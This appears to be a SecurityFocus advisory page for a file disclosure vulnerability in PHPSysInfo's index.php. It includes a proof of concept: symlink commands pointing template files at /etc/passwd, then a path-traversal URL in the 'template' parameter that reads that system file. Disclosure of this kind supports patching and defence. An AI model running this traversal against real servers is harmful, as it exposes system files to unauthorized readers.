info
discussion
exploit
solution
references
PHPSysInfo Index.PHP File Disclosure Vulnerability
The following proof of concept was provided:
~$ ln -s /etc/passwd /tmp/form.tpl
~$ ln -s /etc/passwd /tmp/box.tpl
http://www.example.com/index.php?template=../../../../tmp
Privacy Statement
Copyright 2010, SecurityFocus